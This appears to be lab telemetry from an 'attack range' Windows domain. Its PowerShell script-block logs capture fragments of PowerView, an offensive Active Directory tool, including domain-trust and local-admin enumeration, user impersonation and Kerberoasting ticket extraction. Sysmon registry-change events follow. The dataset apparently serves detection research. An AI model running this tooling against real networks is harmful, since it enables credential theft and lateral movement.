IN_FOREST = 1 DIRECT_OUTBOUND = 2 TREE_ROOT = 4 PRIMARY = 8 NATIVE_MODE = 16 DIRECT_INBOUND = 32 } -Bitfield $DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{ DOWNLEVEL = 1 UPLEVEL = 2 MIT = 3 DCE = 4 } $DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{ NON_TRANSITIVE = 1 UPLEVEL_ONLY = 2 FILTER_SIDS = 4 FOREST_TRANSITIVE = 8 CROSS_ORGANIZATION = 16 WITHIN_FOREST = 32 TREAT_AS_EXTERNAL = 64 } # the DsEnumerateDomainTrusts result structure $DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{ NetbiosDomainName = field 0 String -MarshalAs @('LPWStr') DnsDomainName = field 1 String -MarshalAs @('LPWStr') Flags = field 2 $DsDomainFlag ParentIndex = field 3 UInt32 TrustType = field 4 $DsDomainTrustType TrustAttributes = field 5 $DsDomainTrustAttributes DomainSid = field 6 IntPtr DomainGuid = field 7 Guid } # used by WNetAddConnection2W $NETRESOURCEW = struct $Mod NETRESOURCEW @{ dwScope = field 0 UInt32 dwType = field 1 UInt32 dwDisplayType = field 2 UInt32 dwUsage = field 3 UInt32 lpLocalName = field 4 String -MarshalAs @('LPWStr') lpRemoteName = field 5 String -MarshalAs @('LPWStr') lpComment = field 6 String -MarshalAs @('LPWStr') lpProvider = field 7 String -MarshalAs @('LPWStr') } # all of the Win32 API functions we need $FunctionDefinitions = @( (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError), (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError), (func advapi32 RevertToSelf ([Bool]) @() -SetLastError), (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])), (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])), (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])), (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError) ) $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Netapi32 = $Types['netapi32'] $Advapi32 = $Types['advapi32'] $Wtsapi32 = $Types['wtsapi32'] $Mpr = $Types['Mpr'] $Kernel32 = $Types['kernel32'] Set-Alias Get-IPAddress Resolve-IPAddress Set-Alias Convert-NameToSid ConvertTo-SID Set-Alias Convert-SidToName ConvertFrom-SID Set-Alias Request-SPNTicket Get-DomainSPNTicket Set-Alias Get-DNSZone Get-DomainDNSZone Set-Alias Get-DNSRecord Get-DomainDNSRecord Set-Alias Get-NetDomain Get-Domain Set-Alias Get-NetDomainController Get-DomainController Set-Alias Get-NetForest Get-Forest Set-Alias Get-NetForestDomain Get-ForestDomain Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog Set-Alias Get-NetUser Get-DomainUser Set-Alias Get-UserEvent Get-DomainUserEvent Set-Alias Get-NetComputer Get-DomainComputer Set-Alias Get-ADObject Get-DomainObject Set-Alias Set-ADObject Set-DomainObject Set-Alias Get-ObjectAcl Get-DomainObjectAcl Set-Alias Add-ObjectAcl Add-DomainObjectAcl Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl Set-Alias Get-GUIDMap Get-DomainGUIDMap Set-Alias Get-NetOU Get-DomainOU Set-Alias Get-NetSite Get-DomainSite Set-Alias Get-NetSubnet Get-DomainSubnet Set-Alias Get-NetGroup Get-DomainGroup Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup Set-Alias Get-NetGroupMember Get-DomainGroupMember Set-Alias Get-NetFileServer Get-DomainFileServer Set-Alias Get-DFSshare Get-DomainDFSShare Set-Alias Get-NetGPO Get-DomainGPO Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMapping Set-Alias Get-LoggedOnLocal Get-RegLoggedOn Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess Set-Alias Get-SiteName Get-NetComputerSiteName Set-Alias Get-Proxy Get-WMIRegProxy Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive Set-Alias Get-NetProcess Get-WMIProcess Set-Alias Invoke-ThreadedFunction New-ThreadedFunction Set-Alias Invoke-UserHunter Find-DomainUserLocation Set-Alias Invoke-ProcessHunter Find-DomainProcess Set-Alias Invoke-EventHunter Find-DomainUserEvent Set-Alias Invoke-ShareFinder Find-DomainShare Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember Set-Alias Get-NetDomainTrust Get-DomainTrust Set-Alias Get-NetForestTrust Get-ForestTrust Set-Alias Find-ForeignUser Get-DomainForeignUser Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping Set-Alias Get-DomainPolicy Get-DomainPolicyData 0b9a2617-f976-422c-8b66-9651fb5772efC:\Tools\pw.ps1 4104132150x0170093Microsoft-Windows-PowerShell/Operationalar-win-dc.attackrange.local6064'ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } if ($PSBoundParameters['ComputerName']) { $TargetComputers = $ComputerName } else { Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain' $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname } Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)" if ($TargetComputers.Length -eq 0) { throw '[Find-DomainLocalGroupMember] No hosts found to enumerate' } # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { Param($ComputerName, $GroupName, $Method, $TokenHandle) # Add check if user defaults to/selects "Administrators" if ($GroupName -eq "Administrators") { $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null) $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1] } if ($TokenHandle) { # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet } ForEach ($TargetComputer in $ComputerName) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer if ($Up) { $NetLocalGroupMemberArguments = @{ 'ComputerName' = $TargetComputer 'Method' = $Method 'GroupName' = $GroupName } Get-NetLocalGroupMember @NetLocalGroupMemberArguments } } if ($TokenHandle) { Invoke-RevertToSelf } } $LogonToken = $Null if ($PSBoundParameters['Credential']) { if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { $LogonToken = Invoke-UserImpersonation -Credential $Credential } else { $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet } } } PROCESS { # only ignore threading if -Delay is passed if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { Write-Verbose "[Find-DomainLocalGroupMember] Total number of hosts: $($TargetComputers.count)" Write-Verbose "[Find-DomainLocalGroupMember] Delay: $Delay, Jitter: $Jitter" $Counter = 0 $RandNo = New-Object System.Random ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[Find-DomainLocalGroupMember] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $GroupName, $Method, $LogonToken } } else { Write-Verbose "[Find-DomainLocalGroupMember] Using threading with threads: $Threads" # if we're using threading, kick off the script block with New-ThreadedFunction $ScriptParams = @{ 'GroupName' = $GroupName 'Method' = $Method 'TokenHandle' = $LogonToken } # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } ######################################################## # # Domain trust functions below. # ######################################################## function Get-DomainTrust { <# .SYNOPSIS Return all domain trusts for the current domain or a specified domain. Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: Get-Domain, Get-DomainSearcher, Get-DomainSID, PSReflect .DESCRIPTION This function will enumerate domain trust relationships for the current (or a remote) domain using a number of methods. By default, and LDAP search using the filter '(objectClass=trustedDomain)' is used- if any LDAP-appropriate parameters are specified LDAP is used as well. If the -NET flag is specified, the .NET method GetAllTrustRelationships() is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -API flag is specified, the Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead. .PARAMETER Domain Specifies the domain to query for trusts, defaults to the current domain. .PARAMETER API Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in .NET methods. .PARAMETER NET Switch. Use .NET queries to enumerate trusts instead of the default LDAP method. .PARAMETER LDAPFilter Specifies an LDAP query string that is used to filter Active Directory objects. .PARAMETER Properties Specifies the properties of the output object to retrieve from the server. .PARAMETER SearchBase The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Server Specifies an Active Directory server (domain controller) to bind to. .PARAMETER SearchScope Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). .PARAMETER ResultPageSize Specifies the PageSize to set for the LDAP searcher object. .PARAMETER ServerTimeLimit Specifies the maximum amount of time the server spends searching. Default of 120 seconds. .PARAMETER Tombstone Switch. Specifies that the searcher should also return deleted/tombstoned objects. .PARAMETER FindOne Only return one result object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE Get-DomainTrust Return domain trusts for the current domain using built in .LDAP methods. .EXAMPLE Get-DomainTrust -NET -Domain "prod.testlab.local" Return domain trusts for the "prod.testlab.local" domain using .NET methods .EXAMPLE $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainTrust -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP queries, binding to the PRIMARY.testlab.local server for queries, and using the specified alternate credenitals. .EXAMPLE Get-DomainTrust -API -Domain "prod.testlab.local" Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. .OUTPUTS PowerView.DomainTrust.LDAP Custom PSObject with translated domain LDAP trust result fields (default). PowerView.DomainTrust.NET A TrustRelationshipInformationCollection returned when using .NET methods. PowerView.DomainTrust.API Custom PSObject with translated domain API trust result fields. #> [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.DomainTrust.NET')] [OutputType('PowerView.DomainTrust.LDAP')] [OutputType('PowerView.DomainTrust.API')] [CmdletBinding(DefaultParameterSetName = 'LDAP')] Param( [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('Name')] [ValidateNotNullOrEmpty()] [String] $Domain, [Parameter(ParameterSetName = 'API')] [Switch] $API, [Parameter(ParameterSetName = 'NET')] [Switch] $NET, [Parameter(ParameterSetName = 'LDAP')] [ValidateNotNullOrEmpty()] [Alias('Filter')] [String] $LDAPFilter, [Parameter(ParameterSetName = 'LDAP')] [ValidateNotNullOrEmpty()] [String[]] $Properties, [Parameter(ParameterSetName = 'LDAP')] [ValidateNotNullOrEmpty()] [Alias('ADSPath')] [String] $SearchBase, [Parameter(ParameterSetName = 'LDAP')] [Parameter(ParameterSetName = 'API')] [ValidateNotNullOrEmpty()] [Alias('DomainController')] [String] $Server, [Parameter(ParameterSetName = 'LDAP')] [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [Parameter(ParameterSetName = 'LDAP')] [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [Parameter(ParameterSetName = 'LDAP')] [ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [Parameter(ParameterSetName = 'LDAP')] [Switch] $Tombstone, [Alias('ReturnOne')] [Switch] $FindOne, [Parameter(ParameterSetName = 'LDAP')] [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $TrustAttributes = @{ [uint32]'0x00000001' = 'NON_TRANSITIVE' [uint32]'0x00000002' = 'UPLEVEL_ONLY' [uint32]'0x00000004' = 'FILTER_SIDS' [uint32]'0x00000008' = 'FOREST_TRANSITIVE' [uint32]'0x00000010' = 'CROSS_ORGANIZATION' [uint32]'0x00000020' = 'WITHIN_FOREST' [uint32]'0x00000040' = 'TREAT_AS_EXTERNAL' [uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION' [uint32]'0x00000100' = 'TRUST_USES_AES_KEYS' [uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' [uint32]'0x00000400' = 'PIM_TRUST' } $LdapSearcherArguments = @{} if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter } if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties } if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $LdapSearch0b9a2617-f976-422c-8b66-9651fb5772efC:\Tools\pw.ps1 4104132150x0170042Microsoft-Windows-PowerShell/Operationalar-win-dc.attackrange.local964et('Base', 'OneLevel', 'Subtree')] [String] $SearchScope = 'Subtree', [ValidateRange(1, 10000)] [Int] $ResultPageSize = 200, [ValidateRange(1, 10000)] [Int] $ServerTimeLimit, [Switch] $Tombstone, [ValidateSet('John', 'Hashcat')] [Alias('Format')] [String] $OutputFormat = 'Hashcat', [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { $UserSearcherArguments = @{ 'SPN' = $True 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' } if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter } if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase } if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } if ($PSBoundParameters['Credential']) { $LogonToken = Invoke-UserImpersonation -Credential $Credential } } PROCESS { if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat } END { if ($LogonToken) { Invoke-RevertToSelf -TokenHandle $LogonToken } } } function Get-PathAcl { <# .SYNOPSIS Enumerates the ACL for a given file path. Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID .DESCRIPTION Enumerates the ACL for a specified file/folder path, and translates the access rules for each entry into readable formats. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. .PARAMETER Path Specifies the local or remote path to enumerate the ACLs for. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target path. .EXAMPLE Get-PathAcl "\\SERVER\Share\" Returns ACLs for the given UNC share. .EXAMPLE gci .\test.txt | Get-PathAcl .EXAMPLE $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred .INPUTS String One of more paths to enumerate ACLs for. .OUTPUTS PowerView.FileACL A custom object with the full path and associated ACL entries. .LINK https://support.microsoft.com/en-us/kb/305144 #> [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('PowerView.FileACL')] [CmdletBinding()] Param( [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('FullName')] [String[]] $Path, [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] $Credential = [Management.Automation.PSCredential]::Empty ) BEGIN { function Convert-FileRight { # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights [CmdletBinding()] Param( [Int] $FSR ) $AccessMask = @{ [uint32]'0x80000000' = 'GenericRead' [uint32]'0x40000000' = 'GenericWrite' [uint32]'0x20000000' = 'GenericExecute' [uint32]'0x10000000' = 'GenericAll' [uint32]'0x02000000' = 'MaximumAllowed' [uint32]'0x01000000' = 'AccessSystemSecurity' [uint32]'0x00100000' = 'Synchronize' [uint32]'0x00080000' = 'WriteOwner' [uint32]'0x00040000' = 'WriteDAC' [uint32]'0x00020000' = 'ReadControl' [uint32]'0x00010000' = 'Delete' [uint32]'0x00000100' = 'WriteAttributes' [uint32]'0x00000080' = 'ReadAttributes' [uint32]'0x00000040' = 'DeleteChild' [uint32]'0x00000020' = 'Execute/Traverse' [uint32]'0x00000010' = 'WriteExtendedAttributes' [uint32]'0x00000008' = 'ReadExtendedAttributes' [uint32]'0x00000004' = 'AppendData/AddSubdirectory' [uint32]'0x00000002' = 'WriteData/AddFile' [uint32]'0x00000001' = 'ReadData/ListDirectory' } $SimplePermissions = @{ [uint32]'0x1f01ff' = 'FullControl' [uint32]'0x0301bf' = 'Modify' [uint32]'0x0200a9' = 'ReadAndExecute' [uint32]'0x02019f' = 'ReadAndWrite' [uint32]'0x020089' = 'Read' [uint32]'0x000116' = 'Write' } $Permissions = @() # get simple permission $Permissions += $SimplePermissions.Keys | ForEach-Object { if (($FSR -band $_) -eq $_) { $SimplePermissions[$_] $FSR = $FSR -band (-not $_) } } # get remaining extended permissions $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] } ($Permissions | Where-Object {$_}) -join ',' } $ConvertArguments = @{} if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } $MappedComputers = @{} } PROCESS { ForEach ($TargetPath in $Path) { try { if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { $HostComputer = (New-Object System.Uri($TargetPath)).Host if (-not $MappedComputers[$HostComputer]) { # map IPC$ to this computer if it's not already Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential $MappedComputers[$HostComputer] = $True } } $ACL = Get-Acl -Path $TargetPath $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object { $SID = $_.IdentityReference.Value $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments $Out = New-Object PSObject $Out | Add-Member Noteproperty 'Path' $TargetPath $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__) $Out | Add-Member Noteproperty 'IdentityReference' $Name $Out | Add-Member Noteproperty 'IdentitySID' $SID $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL') $Out } } catch { Write-Verbose "[Get-PathAcl] error: $_" } } } END { # remove the IPC$ mappings $MappedComputers.Keys | Remove-RemoteConnection } } function Convert-LDAPProperty { <# .SYNOPSIS Helper that converts specific LDAP property result fields and outputs a custom psobject. Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None .DESCRIPTION Converts a set of raw LDAP properties results from ADSI/LDAP searches into a proper PSObject. Used by several of the Get-Domain* function. .PARAMETER Properties Properties object to extract out LDAP fields for display. .OUTPUTS System.Management.Automation.PSCustomObject A custom PSObject with LDAP hashtable properties translated. #> [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] Param( [Parameter(Mandatory = $True, ValueFromPipeline = $True)] [ValidateNotNullOrEmpty()] $Properties ) $ObjectProperties = @{} $Properties.PropertyNames | ForEach-Object { if ($_ -ne 'adspath') { if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { # convert all listed sids (i.e. if multiple are listed in sidHistory) $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value } } elseif ($_ -eq 'grouptype') { $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum } elseif ($_ -eq 'samaccounttype') { $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum } elseif ($_ -eq 'objectguid') { # convert the GUID to a string $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid } elseif ($_ -eq 'useraccountcontrol') { $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum } elseif ($_ -eq 'ntsecuritydescriptor') { # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 if ($Descriptor.Owner) { $ObjectProperties['Owner'] = $Descriptor.Owner } if ($Descriptor.Group) { $ObjectProperties['Group'] = $Descriptor.Group } if ($Descriptor.DiscretionaryAcl) { $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl } if ($Descriptor.SystemAcl) { $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl } } elseif ($_ -eq 'accountexpires') { if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) { $ObjectProperties[$_] = "NEVER" } else { $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0]) } } elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { # convert timestamps if ($Properties[$_][0] -is [System.MarshalByRefObject]) { # if we have a System.__ComObject $Temp = $Properties[$_][0] [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null) $Object0b9a2617-f976-422c-8b66-9651fb5772efC:\Tools\pw.ps1 13241300x80000000000000004875Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:25:44.847{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000001)ATTACKRANGE\Administrator 13241300x80000000000000004872Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:25:01.756{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004867Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:24:52.213{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\New Value #1DWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004759Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:07:08.734{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001)ATTACKRANGE\Administrator 13241300x80000000000000004752Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:06:36.112{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004745Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 23:05:13.094{03D06954-22D8-65BC-EC03-000000004703}4752C:\Windows\regedit.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\New Value #1DWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000002559Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-01 22:42:50.638{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000002478Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-01 22:39:33.703{7A09209E-1DA5-65BC-AE03-000000004703}2408C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000)AR-WIN-2\Administrator 13241300x80000000000000002477Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-01 22:39:33.703{7A09209E-1DA5-65BC-AE03-000000004703}2408C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet 